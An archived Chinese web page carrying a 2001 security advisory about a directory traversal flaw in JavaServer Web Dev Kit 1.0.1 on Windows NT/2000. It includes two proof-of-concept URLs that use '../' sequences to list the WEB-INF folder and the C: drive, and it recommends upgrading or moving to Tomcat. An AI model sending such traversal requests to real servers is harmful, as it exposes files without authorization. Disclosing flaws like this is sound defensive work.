11.html

写给JSP初级程序员的书

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="description" content="Java,JDBC,EJB,Open Source,jdk,rmi">
<meta name="Keywords"
content="Java, servlets, Java servlet, Javascript, ActiveX, VRML,
        applet, applets, directory, news, jdbc, applications, 
        Java applications, Java developer, Java development, developer, 
        classes, Jars.com, Jars, intranet, Java applet, Javabeans, 
        Java products, JDK, Java development kit, java development environment, JIT,
        JavaPlan, enterprise tools, JVM, Java Virtual Machine, Java resources, 
        SUN, CGI, Perl, database, network, html,
        xml, dhtml, rating, ratings, review, jars, cgi, programming,
        software review, software rating">
<title>csdn_JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞</title>
<style>
.news {   BACKGROUND: #007cd3;  font-family: "宋体"; font-size: 9pt }
.t {  font-family: "宋体"; font-size: 9pt }
.t1 { color:#007cd3;  font-family: "宋体"; font-size: 9pt }
.white { font-family: "宋体"; font-size: 9pt;color:#FFFFFF }
.red { font-family: "宋体"; font-size: 9pt;color:#FF0000 }
A:visited {color:#0000FF}
A:hover {color: #ff6666; text-decoration: none}
.text {font-size: 12px; line-height: 160%; font-family: "宋体"}
.text1 {color:#000000; font-size: 12px; line-height: 130%; font-family: "宋体"; text-decoration: none}
.text1:visited {color:#000000}
.text1:hover {color: #000000}
.text2 {color:#000000; font-size: 12px; line-height: 130%; font-family: "宋体"; text-decoration: none}
.text2:visited {color:#000000}
.text2:hover {color: #000000}
.text3 {font-size: 12px; line-height: 100%; font-family: "宋体"; text-decoration: none}
.large {font-size: 14.8px; line-height: 130%}
</style>
</head>

<body


<!--start first table -->



  <tr>
    <td WIDTH="100%" VALIGN="TOP">
      <tr>
        <td WIDTH="100%" CLASS="white"></td>
      </tr>
    
      <tr>
        <td WIDTH="50%" bordercolor="#FFFFFF" CLASS="t1" bgcolor="#F0F0F0" align="center" nowrap>JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞(2001-05-04)</td>
        
      </tr>
      <tr>
        <td WIDTH="100%" bordercolor="#FFFFFF" CLASS="t" bgcolor="#F0F0F0" colspan="2">
        <pre>
        
涉及程序： 
JavaServer Web Dev Kit(JSWDK) 
  
描述： 
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞 
  
详细： 
发现装了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系统存在漏洞，
攻击者通过构造特殊的 URL 请求能访问未授权文件。

exploits: 
http://localhost:8080/examples//WEB-INF/ 
会列出 /WEB-INF/ 目录 . 

http://localhost:8080/../examples//WEB-INF/../../../../../ 
如果 JSWDK 被装在 c:\ ，此请求将会列出 c:\ 下所有目录和文件

受影响系统：
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 
  
解决方案： 
CNNS 建议您升级 JSWDK 版本 

建议您升级到tomcat.


<pre>

        </td>
      </tr>
    </td>
  </tr>
</div>
</body>
</html>